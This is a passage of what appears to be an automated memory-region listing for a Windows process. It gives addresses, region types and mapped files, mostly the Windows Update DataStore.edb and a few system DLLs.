	          end_va = 0x1657175ffff
	     entry_point = 0x16571750000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 893
	        start_va = 0x16571760000
	          end_va = 0x1657176ffff
	     entry_point = 0x16571760000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 894
	        start_va = 0x16571770000
	          end_va = 0x1657177ffff
	     entry_point = 0x16571770000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 895
	        start_va = 0x16571780000
	          end_va = 0x1657178ffff
	     entry_point = 0x16571780000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 896
	        start_va = 0x16571790000
	          end_va = 0x1657179ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571790000"
	        filename = ""

Region:
	              id = 897
	        start_va = 0x165717a0000
	          end_va = 0x165717affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165717a0000"
	        filename = ""

Region:
	              id = 898
	        start_va = 0x165717b0000
	          end_va = 0x165717b3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165717b0000"
	        filename = ""

Region:
	              id = 899
	        start_va = 0x165717c0000
	          end_va = 0x165717cffff
	     entry_point = 0x165717c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 900
	        start_va = 0x165717d0000
	          end_va = 0x165717dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165717d0000"
	        filename = ""

Region:
	              id = 901
	        start_va = 0x165717e0000
	          end_va = 0x165717effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165717e0000"
	        filename = ""

Region:
	              id = 902
	        start_va = 0x165717f0000
	          end_va = 0x165717fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165717f0000"
	        filename = ""

Region:
	              id = 903
	        start_va = 0x16571800000
	          end_va = 0x1657180ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571800000"
	        filename = ""

Region:
	              id = 904
	        start_va = 0x16571810000
	          end_va = 0x16571810fff
	     entry_point = 0x16571810000
	     region_type = mapped_file
	            name = "msxml6r.dll"
	        filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")

Region:
	              id = 905
	        start_va = 0x16571820000
	          end_va = 0x16571820fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000016571820000"
	        filename = ""

Region:
	              id = 906
	        start_va = 0x16571830000
	          end_va = 0x1657183ffff
	     entry_point = 0x16571830000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 907
	        start_va = 0x16571840000
	          end_va = 0x16571841fff
	     entry_point = 0x16571840000
	     region_type = mapped_file
	            name = "activeds.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui")

Region:
	              id = 908
	        start_va = 0x16571850000
	          end_va = 0x16571854fff
	     entry_point = 0x16571850000
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")

Region:
	              id = 909
	        start_va = 0x16571860000
	          end_va = 0x1657186ffff
	     entry_point = 0x16571860000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 910
	        start_va = 0x16571870000
	          end_va = 0x1657187ffff
	     entry_point = 0x16571870000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 911
	        start_va = 0x16571880000
	          end_va = 0x16571886fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571880000"
	        filename = ""

Region:
	              id = 912
	        start_va = 0x16571890000
	          end_va = 0x1657189ffff
	     entry_point = 0x16571890000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 913
	        start_va = 0x165718a0000
	          end_va = 0x165718affff
	     entry_point = 0x165718a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 914
	        start_va = 0x165718b0000
	          end_va = 0x165718bffff
	     entry_point = 0x165718b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 915
	        start_va = 0x165718c0000
	          end_va = 0x165718cffff
	     entry_point = 0x165718c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 916
	        start_va = 0x165718d0000
	          end_va = 0x165718dffff
	     entry_point = 0x165718d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 917
	        start_va = 0x165718e0000
	          end_va = 0x165718effff
	     entry_point = 0x165718e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 918
	        start_va = 0x165718f0000
	          end_va = 0x165718fffff
	     entry_point = 0x165718f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 919
	        start_va = 0x16571900000
	          end_va = 0x165719fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571900000"
	        filename = ""

Region:
	              id = 920
	        start_va = 0x16571a00000
	          end_va = 0x16571afffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000016571a00000"
	        filename = ""

Region:
	              id = 921
	        start_va = 0x16571b00000
	          end_va = 0x16571b0ffff
	     entry_point = 0x16571b00000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 922
	        start_va = 0x16571b10000
	          end_va = 0x16571b1ffff
	     entry_point = 0x16571b10000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 923
	        start_va = 0x16571b20000
	          end_va = 0x16571b2ffff
	     entry_point = 0x16571b20000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 924
	        start_va = 0x16571b30000
	          end_va = 0x16571b3ffff
	     entry_point = 0x16571b30000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 925
	        start_va = 0x16571b40000
	          end_va = 0x16571b4ffff
	     entry_point = 0x16571b40000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 926
	        start_va = 0x16571b50000
	          end_va = 0x16571b5ffff
	     entry_point = 0x16571b50000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 927
	        start_va = 0x16571b60000
	          end_va = 0x16571b6ffff
	     entry_point = 0x16571b60000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 928
	        start_va = 0x16571b70000
	          end_va = 0x16571b7ffff
	     entry_point = 0x16571b70000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 929
	        start_va = 0x16571b80000
	          end_va = 0x16571b8ffff
	     entry_point = 0x16571b80000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 930
	        start_va = 0x16571b90000
	          end_va = 0x16571b9ffff
	     entry_point = 0x16571b90000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 931
	        start_va = 0x16571ba0000
	          end_va = 0x16571baffff
	     entry_point = 0x16571ba0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 932
	        start_va = 0x16571bb0000
	          end_va = 0x16571bbffff
	     entry_point = 0x16571bb0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 933
	        start_va = 0x16571bc0000
	          end_va = 0x16571bcffff
	     entry_point = 0x16571bc0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 934
	        start_va = 0x16571bd0000
	          end_va = 0x16571bdffff
	     entry_point = 0x16571bd0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 935
	        start_va = 0x16571be0000
	          end_va = 0x16571be6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571be0000"
	        filename = ""

Region:
	              id = 936
	        start_va = 0x16571bf0000
	          end_va = 0x16571bfffff
	     entry_point = 0x16571bf0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 937
	        start_va = 0x16571c00000
	          end_va = 0x16571c0ffff
	     entry_point = 0x16571c00000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 938
	        start_va = 0x16571c10000
	          end_va = 0x16571c1ffff
	     entry_point = 0x16571c10000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 939
	        start_va = 0x16571c20000
	          end_va = 0x16571c2ffff
	     entry_point = 0x16571c20000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 940
	        start_va = 0x16571c30000
	          end_va = 0x16571c3ffff
	     entry_point = 0x16571c30000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 941
	        start_va = 0x16571c40000
	          end_va = 0x16571c4ffff
	     entry_point = 0x16571c40000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 942
	        start_va = 0x16571c50000
	          end_va = 0x16571c5ffff
	     entry_point = 0x16571c50000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 943
	        start_va = 0x16571c60000
	          end_va = 0x16571c6ffff
	     entry_point = 0x16571c60000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 944
	        start_va = 0x16571c70000
	          end_va = 0x16571c7ffff
	     entry_point = 0x16571c70000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 945
	        start_va = 0x16571c80000
	          end_va = 0x16571c8ffff
	     entry_point = 0x16571c80000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 946
	        start_va = 0x16571c90000
	          end_va = 0x16571c9ffff
	     entry_point = 0x16571c90000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 947
	        start_va = 0x16571ca0000
	          end_va = 0x16571caffff
	     entry_point = 0x16571ca0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 948
	        start_va = 0x16571cb0000
	          end_va = 0x16571cbffff
	     entry_point = 0x16571cb0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 949
	        start_va = 0x16571cc0000
	          end_va = 0x16571ccffff
	     entry_point = 0x16571cc0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 950
	        start_va = 0x16571cd0000
	          end_va = 0x16571cdffff
	     entry_point = 0x16571cd0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 951
	        start_va = 0x16571ce0000
	          end_va = 0x16571ce6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571ce0000"
	        filename = ""

Region:
	              id = 952
	        start_va = 0x16571cf0000
	          end_va = 0x16571cfffff
	     entry_point = 0x16571cf0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 953
	        start_va = 0x16571d00000
	          end_va = 0x16571dfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571d00000"
	        filename = ""

Region:
	              id = 954
	        start_va = 0x16571e00000
	          end_va = 0x16571efffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571e00000"
	        filename = ""

Region:
	              id = 955
	        start_va = 0x16571f00000
	          end_va = 0x16571ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571f00000"
	        filename = ""

Region:
	              id = 956
	        start_va = 0x16572000000
	          end_va = 0x165720fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016572000000"
	        filename = ""

Region:
	              id = 957
	        start_va = 0x16572100000
	          end_va = 0x1657210ffff
	     entry_point = 0x16572100000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 958
	        start_va = 0x16572110000
	          end_va = 0x1657211ffff
	     entry_point = 0x16572110000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 959
	        start_va = 0x16572120000
	          end_va = 0x1657212ffff
	     entry_point = 0x16572120000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 960
	        start_va = 0x16572130000
	          end_va = 0x1657213ffff
	     entry_point = 0x16572130000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 961
	        start_va = 0x16572140000
	          end_va = 0x1657214ffff
	     entry_point = 0x16572140000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 962
	        start_va = 0x16572150000
	          end_va = 0x1657215ffff
	     entry_point = 0x16572150000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 963
	        start_va = 0x16572160000
	          end_va = 0x1657216ffff
	     entry_point = 0x16572160000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 964
	        start_va = 0x16572170000
	          end_va = 0x1657217ffff
	     entry_point = 0x16572170000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 965
	        start_va = 0x16572180000
	          end_va = 0x1657218ffff
	     entry_point = 0x16572180000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 966
	        start_va = 0x16572190000
	          end_va = 0x1657219ffff
	     entry_point = 0x16572190000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 967
	        start_va = 0x165721a0000
	          end_va = 0x165721affff
	     entry_point = 0x165721a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 968
	        start_va = 0x165721b0000
	          end_va = 0x165721bffff
	     entry_point = 0x165721b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 969
	        start_va = 0x165721c0000
	          end_va = 0x165721cffff
	     entry_point = 0x165721c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 970
	        start_va = 0x165721d0000
	          end_va = 0x165721dffff
	     entry_point = 0x165721d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 971
	        start_va = 0x165721e0000
	          end_va = 0x165721effff
	     entry_point = 0x165721e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 972
	        start_va = 0x165721f0000
	          end_va = 0x165721fffff
	     entry_point = 0x165721f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 973
	        start_va = 0x16572200000
	          end_va = 0x1657220ffff
	     entry_point = 0x16572200000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 974
	        start_va = 0x16572210000
	          end_va = 0x1657221ffff
	     entry_point = 0x16572210000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 975
	        start_va = 0x16572220000
	          end_va = 0x1657222ffff
	     entry_point = 0x16572220000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 976
	        start_va = 0x16572230000
	          end_va = 0x1657223ffff
	     entry_point = 0x16572230000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 977
	        start_va = 0x16572240000
	          end_va = 0x1657224ffff
	     entry_point = 0x16572240000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 978
	        start_va = 0x16572250000
	          end_va = 0x1657225ffff
	     entry_point = 0x16572250000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 979
	        start_va = 0x16572260000
	          end_va = 0x1657226ffff
	     entry_point = 0x16572260000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 980
	        start_va = 0x16572270000
	          end_va = 0x1657227ffff
	     entry_point = 0x16572270000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 981
	        start_va = 0x16572280000
	          end_va = 0x1657228ffff
	     entry_point = 0x16572280000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 982
	        start_va = 0x16572290000
	          end_va = 0x1657229ffff
	     entry_point = 0x16572290000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 983
	        start_va = 0x165722a0000
	          end_va = 0x165722affff
	     entry_point = 0x165722a0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 984
	        start_va = 0x165722b0000
	          end_va = 0x165722bffff
	     entry_point = 0x165722b0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 985
	        start_va = 0x165722c0000
	          end_va = 0x165722cffff
	     entry_point = 0x165722c0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 986
	        start_va = 0x165722d0000
	          end_va = 0x165722dffff
	     entry_point = 0x165722d0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 987
	        start_va = 0x165722e0000
	          end_va = 0x165722effff
	     entry_point = 0x165722e0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 988
	        start_va = 0x165722f0000
	          end_va = 0x165722fffff
	     entry_point = 0x165722f0000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 989
	        start_va = 0x16572300000
	          end_va = 0x1657230ffff
	     entry_point = 0x16572300000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 990
	        start_va = 0x16572310000
	          end_va = 0x1657231ffff
	     entry_point = 0x16572310000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 991
	        start_va = 0x16572320000
	          end_va = 0x1657232ffff
	     entry_point = 0x16572320000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 992
	        start_va = 0x16572330000
	          end_va = 0x1657233ffff
	     entry_point = 0x16572330000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 993
	        start_va = 0x16572340000
	          end_va = 0x1657234ffff
	     entry_point = 0x16572340000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 994
	        start_va = 0x16572350000
	          end_va = 0x1657235ffff
	     entry_point = 0x16572350000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 995
	        start_va = 0x16572360000
	          end_va = 0x1657236ffff
	     entry_point = 0x16572360000
	     region_type = mapped_file
	            name = "datastore.edb"
